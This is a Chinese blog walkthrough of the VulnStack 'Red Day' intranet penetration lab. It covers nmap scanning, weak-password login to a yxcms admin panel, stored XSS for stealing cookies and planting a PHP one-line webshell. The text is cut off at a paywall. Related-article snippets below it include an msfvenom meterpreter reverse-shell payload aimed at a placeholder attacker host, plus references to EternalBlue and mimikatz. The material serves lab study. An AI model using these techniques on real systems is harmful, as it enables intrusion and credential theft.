内网渗透——红日靶机学习(一)

最新推荐文章于 2024-09-15 16:09:14 发布
最新推荐文章于 2024-09-15 16:09:14 发布
阅读量6.3k 收藏 45
点赞数 14
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41832837/article/details/109664477
版权
本文介绍了内网渗透的学习过程,通过红日靶机进行环境搭建,包括WIN7、WIN2008和WIN2003的部署。在渗透测试环节,详细阐述了外网打点的步骤,如信息收集、Namp扫描、XSS存储型漏洞利用,以及PHPMyAdmin弱口令拿shell等。此外,文章还探讨了内网渗透技术,如开启/连接3389端口,利用CMD和MSF进行横向渗透,并展示了信息收集和权限提升的方法。
摘要由CSDN通过智能技术生成

前言

开启内网学习,域渗透之路...

 

环境搭建

官方下载地址以及实验文档如下:
http://vulnstack.qiyuanxuetang.net/vuln/detail/2/


内网拓扑:


我选用wmware ESXI进行内网环境搭建,内网搭建如下:

WIN7(web服务器):172.26.16.123/192.168.52.143
WIN2008(域控):192.168.52.138
WIN2003(域成员):192.168.52.141

 

渗透测试

一、外网打点

信息收集
Namp进行端口扫描: nmap -T4 -A 172.26.16.123

得知目标80端口开启,3306端口开放表示网站数据库是mysql,访问其站点

页面403,因此尝试扫描一级目录,发现备份文件beifen.rar、以及phpinfo.php和phpmyadmin

下载beifen.rar解压进行简单的源代码审阅,知道使用yxcms进行网站搭建,通过查看“升级日志.txt”,得知版本号1.2.1

推测该网站二级目录下可能存在yxcms的网站

弱口令登录
访问主站发现公告栏目泄露后台路径:/index.php?r=admin,且初始账号密码是弱口令,admin、123456

成功登陆到后台

XSS存储型漏洞
通过查找功能点,发现网站主页有一个留言本功能,任意用户提交数据后需要管理员登录后台审核,由于没有对XSS进行防范,导致XSS攻击。因此,当我们没有那么幸运的得到管理员账号密码的时候,就可以用此XSS尝试获取管理员cookie,从而进入后台。

我们的目的是拿下整个内网,因此xss是远远不够的。通过我们拿到刚刚拿到yxcms版本号为1.2.1的信息,翻阅相关资料知道该版本还存在一处可getshell的高危漏洞。

前台模板代码任意修改拿shell

找到前台模板位置,可以看到这些php文件都是可以编辑的,且可以新建一个php文件

新建一句个文件shell.php,写入一句话木马

创建成功后我们通过刚刚拿到的网站源码,进行文件目录查找,最后找到木马生成后的位置如下:

访问一句话木马http://172.26.16.123/yxcms/protected/apps/default/view/default/shell.php,没有问题。


菜刀连接

最低0.47元/天 解锁文章
「已注销」
关注
2024年内网域渗透总结——红日靶场①_红日靶机账号密码
2401_84264096的博客
05-01 400
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。最后就是大家最关心的网络安全面试题板块。
红日靶场渗透测试——红日靶场1(详细笔记)
qq_52849046的博客
05-24 7046
这篇博客是为小编自己学习记录的同时,分享出来让大神们共同检阅,如有问题,还请各位大神在评论区多多指点。ps:此文章仅学习使用,切勿用于实战,容易被gangan
内网渗透- 内网渗透的基本知识
最新发布
qq_64177395的博客
09-15 1717
内网也指局域网,是指在某一区域内由多台计算机互联而成的计算机组,组网范围通常在数千米以内。在局域网中,可以实现文件管理、应用软件共享、打印机共享、工作组内的日程安排、电子邮件和传真通信服务等。内网是封闭的,可以由办公室内的两台计算机组成,也可以有一个公司内的大量计算机组成在一个大型单位里,可能有成百上千台计算机互相连接组成局域网,它们都会列在"网络"(网上邻居) 内。如果不对这些计算机进行分组,网络的混乱程度是可想而知的 为了解决这一问题,产生了工作组( Work Group)这个概念。
红日靶场内网渗透(一)
m0_52923241的博客
02-07 4157
适合第一次搭建内网的师傅们——红日靶场内网渗透(一) 文章目录一、环境搭建二、渗透思路2.1 信息收集2.2 漏洞发现漏洞一:弱口令漏洞二:xss漏洞三:任意文件读取漏洞四:phpmyadmin文件写入2.3 漏洞利用2.4 内网渗透三、常见知识点3.1 探针文件3.2 yxcms1.2.1四、常用工具4.1 nmap4.2 蚁剑4.3 cs4.4 msf 一、环境搭建 前言:第一次搭建内网环境,花了两天时间。终于是搞清楚了各种配置,和每个主机之间的关系 靶机下载链接:红日实战靶场,一共三个靶机
浅谈内网渗透
crystal0011的专栏
06-15 829
转自:freebuf.com 引子 离上篇文章的时间过去很久了,答应写一篇内网渗透的文章,今天抽点时间,把这个坑给添平了吧。标题是浅谈,所以我不认为自己能在内网渗透写的有多深入。渗透这玩意更多是经验,积累的多了自然水到渠成。而且我个人认为很多前辈人物都已经写的很好了,我这里纯粹抛砖引玉,把前辈级人物的经验集成在一起,也算基础篇吧。如果有不足的地方或者有更好的实现方法,欢迎随时交流。交流方式就以
内网域渗透总结(红日靶场一)
未完成的歌~的博客
04-11 7094
使用 smb beacon,由一台已经拿到 beacon 的机器,抓取密码后进行smb喷射,得到另一台开放445端口的机器上的administrator账户密码,在目标机器不出网的情况下,可以使用smb beacon使目标主机上线。发现也存在漏洞,同样先使用 use exploit/windows/smb/ms17_010_eternalblue 模块利用,但还是利用不了,猜测可能是防火墙的问题,因为这个系统是64位的。防火墙已经关掉了,再来试试 ms17_010_eternalblue,然而还是不行。
红日安全靶机实战(一)
qq_41891666的博客
08-07 6327
0x01 入侵web服务器 0x 1.1 信息收集 首先使用 nmap 来扫描ip 段存活的主机 nmap -sn 192.168.127.0/24 这里网上有的用 netdiscover 来扫描,其实和 nmap -sn 扫描原理是一样的,都是通过arp 来实现扫描。 然后接着nmap 激进模式扫端口: nmap -A -T4 192.168.127.154 发现80端口,浏览器访问,发现是phpStudy 搭建的环境,而且网站根路径是C:/php/WWW: 0x 1.2 写webshell
内网域渗透总结——红日靶场①_红日靶机账号密码
2401_83974590的博客
04-29 358
外网:192.168.43.17内网:192.168.52.143可以Ping通外网通192.168.52.138(win2008)通192.168.52.141(win2003)小皮必须是自带的,下载的新版本会导致kali机连接目标失败问题原理:自行理解内网两台不出网win互通win7开启phpstudywin11访问80端口得到phpstudy探针#发现开启了80,3306端口#访问发现80端口是php探针。
2024年运维最新内网域渗透总结——红日靶场①_红日靶机账号密码(2),2024年最新最新大厂Linux运维校招面试经验汇总
05-04 687
最近很多小伙伴找我要Linux学习资料,于是我翻箱倒柜,整理了一些优质资源,涵盖视频、电子书、PPT等共享给大家!
红日内网渗透靶场1(ATK&CK红队评估实战靶场一)
热门推荐
qq_45780190的博客
02-21 1万+
环境搭建: 官方下载地址以及实验文档如下: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 网络拓扑 需要模拟内网和外网两个网段, Win7 虚拟机相当于网关服务器,所以需要两张网卡,一个用来向外网提供web服务,一个是通向内网。添加网络设配器如下图。 将 Win7 的网络适配器 1 设置成 VMnet1 仅主机模式(内网),网络适配器 2 设置成 NAT 模式(外网)。 而 Win2003、Win2008 网络适配器设置成VMnet1仅主机模式
内网渗透实践——红日靶场
qq_42739469的博客
11-05 343
这一台web服务器具有外部的公网IP地址(192.168.5.134)也具有整个域内部的内网ip,那么我们首先的思路就是拿下这一台web服务器作为我们入侵整个内网的跳板。直到成功创建会话,然后我们使用getuid来查看我们登陆的用户名称以及用户组,发现权限不够需要提权,于是我们使用getsystem进行提权。需要注意的是,在这样的设置中我们的监听主机应该设置跳板机的ip。在清晰了入侵目标以后,我们需要做的就是让kali上的更多工具能够访问到内网,我们才能更快更高效的拿下DC。
渗透测试之——红日靶机(一)
weixin_43072923的博客
04-25 861
红日靶机练习
红日靶机1练习
weixin_45597678的博客
12-01 297
红日靶机1练习 文章目录红日靶机1练习考查知识点渗透过程总结 考查知识点 主机、端口、目录扫描 利用phpmyadmin获得shell 利用mimikatz获取主机的密码hash 进行横向移动hash传递 获取内网主机shell 利用ms17-010获取主机sehll 渗透过程 首先进行主机扫描、端口扫描、目录扫描 进行主机扫描, nmap -sP -PE -PA 192.168.127.0/24 得到在线主机179 进行端口扫描, nmap -P0 -sS -p- -sV -O 192.
红日安全红队靶场(三)一次简单的内网渗透
白帽技术与网络安全
07-24 6105
1、靶场介绍及设置这是红日团队的第三套靶场(靶场下载地址见文末),本次靶场渗透涉及敏感信息泄露、暴力破解、脏牛提权、内网穿透、端口转发、以及域渗透等多种知识点。该靶场环境由5台机器组成,其...
内网渗透靶机-VulnStack 2
weixin_44368248的博客
02-21 5035
目录 内网渗透靶机-VulnStack 2 主机发现 端口扫描 192.168.111.128 192.168.111.201 漏洞利用 内网信息收集 ipconfig /all Tasklist shell net group "domain users" /domain shell net group “domain admins” /domain shell net group “domain computers” /domain shell net group “domai
红日靶机(一) 笔记
LINGX5的博客
09-08 1888
通过 nmap 扫描看到目标 web 服务器开放了 80,135,3306 等端口,通过对 80 端口的目录爆破,弱口令的 fuzz,发现了 phpmyadmin 的后台,并成功登陆。利用数据库的日志输出,写入了一句话木马,成功反弹了 powershell 的命令行,因为 powershell2.0 命令行的缺陷,在域渗透信息收集的时候遇到了 mimikatz 不能使用的情况,尝试解决但失败了。最后使用了 cobalstrike 的集成化工具完成了对域控的横向移动,成功获得域控管理员权限。
红日靶场vulnstack1 内网渗透学习
snowlyzz的博客
09-18 2235
红日靶场渗透教程
【内网攻防实战】红日靶场01(超超超超超超详细!!实操+AI问答,胎教级教程)
weixin_46022776的博客
06-04 6926
问题:解决:日志功能未开启,OFF,执行sql开启ON。
cfs内网渗透centos7靶机下载
12-05
为了在CentOS 7靶机上进行内网渗透,我们可以通过开放80端口并访问网站的方式进行下载。具体步骤如下: 1. 在Kali Linux上打开代理,以便访问CentOS 7靶机的网站。 2. 打开浏览器,输入CentOS 7靶机的IP地址和80端口号,访问网站。 3. 在网站上查找需要下载的文件,并下载到本地。 另外,我们还可以使用msfvenom生成一个meterpreter反向Shell,然后将其上传到CentOS 7靶机上进行下载。具体步骤如下: 1. 在Kali Linux上使用msfvenom生成一个meterpreter反向Shell,命令如下: ```shell msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> SessionCommunicationTimeout=0 SessionExpiration=0 -f elf > muma.elf ``` 其中,`<attacker IP>`和`<attacker port>`分别为攻击者的IP地址和端口号,`muma.elf`为生成的反向Shell文件名。 2. 将生成的反向Shell文件上传到CentOS 7靶机上,可以使用scp命令,命令如下: ```shell scp muma.elf <username>@<target IP>:<path> ``` 其中,`<username>`为CentOS 7靶机上的用户名,`<target IP>`为CentOS 7靶机的IP地址,`<path>`为上传文件的路径。 3. 在CentOS 7靶机上运行反向Shell文件,命令如下: ```shell ./muma.elf ``` 运行后,反向Shell会连接到攻击者的机器,攻击者可以通过反向Shell进行下载等操作。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值